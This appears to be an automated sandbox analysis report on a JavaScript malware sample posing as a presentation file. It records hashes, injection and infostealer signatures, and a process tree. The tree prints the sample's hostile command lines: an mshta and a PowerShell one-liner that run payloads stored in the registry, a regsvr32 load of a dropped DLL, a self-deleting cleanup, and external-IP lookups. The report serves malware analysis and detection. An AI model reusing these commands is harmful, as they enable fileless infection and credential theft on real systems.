Analysis
-
max time kernel
136s -
max time network
144s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
24-05-2020 13:44
Static task
static1
Behavioral task
behavioral1
Sample
my_presentation_c1l.js
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
General
-
Target
my_presentation_c1l.js
-
Size
3.8MB
-
MD5
763c2375aea17fffc6c0e24c2808570c
-
SHA1
10f7b2d55a9a10902b91fb1c0e632e7db257006e
-
SHA256
e4276d8f476bc00d0e1b946a5e4da025575753c7c1b4bbff3408f8a07461f72d
-
SHA512
9a59f0c887368105ff7a5a329a775ff107a7e9ed306d56e4471aa4f7258b581ecc7960edb0ce89dbc411b23244fb45e561b4e2debbd71699df77467e2bd68beb
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 60 IoCs
Processes:
wscript.exeregsvr32.exeiexplore.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 1548 wrote to memory of 1832 1548 wscript.exe regsvr32.exe PID 1548 wrote to memory of 1832 1548 wscript.exe regsvr32.exe PID 1548 wrote to memory of 1832 1548 wscript.exe regsvr32.exe PID 1548 wrote to memory of 1832 1548 wscript.exe regsvr32.exe PID 1548 wrote to memory of 1832 1548 wscript.exe regsvr32.exe PID 1832 wrote to memory of 1836 1832 regsvr32.exe regsvr32.exe PID 1832 wrote to memory of 1836 1832 regsvr32.exe regsvr32.exe PID 1832 wrote to memory of 1836 1832 regsvr32.exe regsvr32.exe PID 1832 wrote to memory of 1836 1832 regsvr32.exe regsvr32.exe PID 1832 wrote to memory of 1836 1832 regsvr32.exe regsvr32.exe PID 1832 wrote to memory of 1836 1832 regsvr32.exe regsvr32.exe PID 1832 wrote to memory of 1836 1832 regsvr32.exe regsvr32.exe PID 1896 wrote to memory of 540 1896 iexplore.exe IEXPLORE.EXE PID 1896 wrote to memory of 540 1896 iexplore.exe IEXPLORE.EXE PID 1896 wrote to memory of 540 1896 iexplore.exe IEXPLORE.EXE PID 1896 wrote to memory of 540 1896 iexplore.exe IEXPLORE.EXE PID 1896 wrote to memory of 2032 1896 iexplore.exe IEXPLORE.EXE PID 1896 wrote to memory of 2032 1896 iexplore.exe IEXPLORE.EXE PID 1896 wrote to memory of 2032 1896 iexplore.exe IEXPLORE.EXE PID 1896 wrote to memory of 2032 1896 iexplore.exe IEXPLORE.EXE PID 1444 wrote to memory of 1844 1444 mshta.exe powershell.exe PID 1444 wrote to memory of 1844 1444 mshta.exe powershell.exe PID 1444 wrote to memory of 1844 1444 mshta.exe powershell.exe PID 1844 wrote to memory of 1536 1844 powershell.exe csc.exe PID 1844 wrote to memory of 1536 1844 powershell.exe csc.exe PID 1844 wrote to memory of 1536 1844 powershell.exe csc.exe PID 1536 wrote to memory of 1544 1536 csc.exe cvtres.exe PID 1536 wrote to memory of 1544 1536 csc.exe cvtres.exe PID 1536 wrote to memory of 1544 1536 csc.exe cvtres.exe PID 1844 wrote to memory of 476 1844 powershell.exe csc.exe PID 1844 wrote to memory of 476 1844 powershell.exe csc.exe PID 1844 wrote to memory of 476 1844 powershell.exe csc.exe PID 476 wrote to memory of 1928 476 csc.exe cvtres.exe PID 476 wrote to memory of 1928 476 csc.exe cvtres.exe PID 476 wrote to memory of 1928 476 csc.exe cvtres.exe PID 1844 wrote to memory of 1320 1844 powershell.exe Explorer.EXE PID 1844 wrote to memory of 1320 1844 powershell.exe Explorer.EXE PID 1844 wrote to memory of 1320 1844 powershell.exe Explorer.EXE PID 1320 wrote to memory of 2004 1320 Explorer.EXE cmd.exe PID 1320 wrote to memory of 2004 1320 Explorer.EXE cmd.exe PID 1320 wrote to memory of 2004 1320 Explorer.EXE cmd.exe PID 1320 wrote to memory of 2004 1320 Explorer.EXE cmd.exe PID 1320 wrote to memory of 1896 1320 Explorer.EXE iexplore.exe PID 1320 wrote to memory of 1896 1320 Explorer.EXE iexplore.exe PID 1320 wrote to memory of 1896 1320 Explorer.EXE iexplore.exe PID 1320 wrote to memory of 2004 1320 Explorer.EXE cmd.exe PID 1320 wrote to memory of 2004 1320 Explorer.EXE cmd.exe PID 2004 wrote to memory of 2028 2004 cmd.exe PING.EXE PID 1320 wrote to memory of 820 1320 Explorer.EXE cmd.exe PID 1320 wrote to memory of 820 1320 Explorer.EXE cmd.exe PID 1320 wrote to memory of 820 1320 Explorer.EXE cmd.exe PID 1320 wrote to memory of 1632 1320 Explorer.EXE cmd.exe PID 1320 wrote to memory of 1632 1320 Explorer.EXE cmd.exe PID 1320 wrote to memory of 1632 1320 Explorer.EXE cmd.exe PID 1320 wrote to memory of 1180 1320 Explorer.EXE cmd.exe PID 1320 wrote to memory of 1180 1320 Explorer.EXE cmd.exe PID 1320 wrote to memory of 1180 1320 Explorer.EXE cmd.exe PID 1320 wrote to memory of 1652 1320 Explorer.EXE cmd.exe PID 1320 wrote to memory of 1652 1320 Explorer.EXE cmd.exe PID 1320 wrote to memory of 1652 1320 Explorer.EXE cmd.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 1844 set thread context of 1320 1844 powershell.exe Explorer.EXE PID 1320 set thread context of 1896 1320 Explorer.EXE iexplore.exe PID 1320 set thread context of 2004 1320 Explorer.EXE cmd.exe PID 2004 set thread context of 2028 2004 cmd.exe PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 2028 PING.EXE -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXEpid process 1320 Explorer.EXE 1320 Explorer.EXE 1320 Explorer.EXE 1320 Explorer.EXE -
Processes:
iexplore.exemshta.exeIEXPLORE.EXEIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007cf8d5bd09b0364592b95b96ab312388000000000200000000001066000000010000200000002aba125fcff6e8700d704374f9e0bfdf81069e2d91403220f8ec02040321527f000000000e8000000002000020000000960b2e986e25d1cfdc56fd5d9ca5a511e9a08f443ac0da79b233dd046529d42e20000000b730e6893bf41802333e8f8b16d97885cac56f58a5afd83af4cdd7e07f4c880f4000000026196a0d9d1b04635f1f5108797d3ee50201eac133b8c495e09093996a927939db8d4fb120943f796187d9513038a4afe443847bbb74e860441eef724956168d iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007cf8d5bd09b0364592b95b96ab31238800000000020000000000106600000001000020000000d5683d9a88280e7ba124aa5a2b104f8acab94ba902377b90f8044e640faf1750000000000e8000000002000020000000b675c63fc4b63322703d844c120fa4f51e8487f679e29482c4697c56cf714589900000000f5b7d817dd0386c63045b815fe4d6a7543b14cf027a3a31b9429b1a1db92cd8b5ecb64abc8043525860f42b39041cda35ca0373251ed779ea42064840c0702d1c6b6ca31d8ebb4af233793589df1ef2690461b4ee5cc88e8d5b209354321e347787fb6db67fb2ec84b25ceefa7b9a802e75be76f0454142a370b6b471b0a619395b578f824571ec8446e853050a4ea340000000cabd789e35c47218040329daffbe55841be5712f52fdc9fe7e5a3cba6203b2bbaf3fda9dd2683e1cd234914d95cb63286dfc288da4c681ff42e0bd737d8215fd iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "297100082" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{8963FE01-9DD5-11EA-B2C5-FED453BC27D5} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0299452e231d601 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe -
Loads dropped DLL 1 IoCs
Processes:
regsvr32.exepid process 1836 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1844 powershell.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 1844 powershell.exe 1320 Explorer.EXE 1320 Explorer.EXE 2004 cmd.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEpid process 1896 iexplore.exe 1896 iexplore.exe 540 IEXPLORE.EXE 540 IEXPLORE.EXE 1896 iexplore.exe 1896 iexplore.exe 2032 IEXPLORE.EXE 2032 IEXPLORE.EXE 1896 iexplore.exe 1896 iexplore.exe 540 IEXPLORE.EXE 540 IEXPLORE.EXE -
Checks whether UAC is enabled 3 IoCs
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of FindShellTrayWindow 7 IoCs
Processes:
iexplore.exeExplorer.EXEpid process 1896 iexplore.exe 1896 iexplore.exe 1896 iexplore.exe 1320 Explorer.EXE 1320 Explorer.EXE 1320 Explorer.EXE 1320 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exeExplorer.EXEpid process 1844 powershell.exe 1844 powershell.exe 1320 Explorer.EXE -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Suspicious use of SendNotifyMessage
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: EnumeratesProcesses
PID:1320 -
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\my_presentation_c1l.js2⤵
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\System32\regsvr32.exe"C:\Windows\System32\regsvr32.exe" -s C:\Users\Admin\AppData\Local\Temp\\zPNqVPAAFG.txt3⤵
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\SysWOW64\regsvr32.exe-s C:\Users\Admin\AppData\Local\Temp\\zPNqVPAAFG.txt4⤵
- Loads dropped DLL
PID:1836
-
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\136B3805-56F5-BDAC-F8F7-EA41AC1BBE05\\Efsltprf'));if(!window.flag)close()</script>"2⤵
- Suspicious use of WriteProcessMemory
- Modifies Internet Explorer settings
PID:1444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\136B3805-56F5-BDAC-F8F7-EA41AC1BBE05").dmrctcls))3⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: MapViewOfSection
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
PID:1844 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zrpdcbvt\zrpdcbvt.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA91A.tmp" "c:\Users\Admin\AppData\Local\Temp\zrpdcbvt\CSCC0F9E68ED157424AA19BC17BA88F28.TMP"5⤵PID:1544
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4tt2sw02\4tt2sw02.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:476 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA9B6.tmp" "c:\Users\Admin\AppData\Local\Temp\4tt2sw02\CSC152F1085B49943A1A96974E3A9A7BCD1.TMP"5⤵PID:1928
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\zPNqVPAAFG.txt"2⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:2004 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Runs ping.exe
PID:2028
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\2A10.bi1"2⤵PID:820
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:996
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\2C78.bi1"2⤵PID:1632
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:360
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2A10.bi1"2⤵PID:1180
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2C78.bi1"2⤵PID:1652
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Suspicious use of WriteProcessMemory
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Checks whether UAC is enabled
- Suspicious use of FindShellTrayWindow
PID:1896 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1896 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Checks whether UAC is enabled
PID:540
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1896 CREDAT:275471 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Checks whether UAC is enabled
PID:2032
-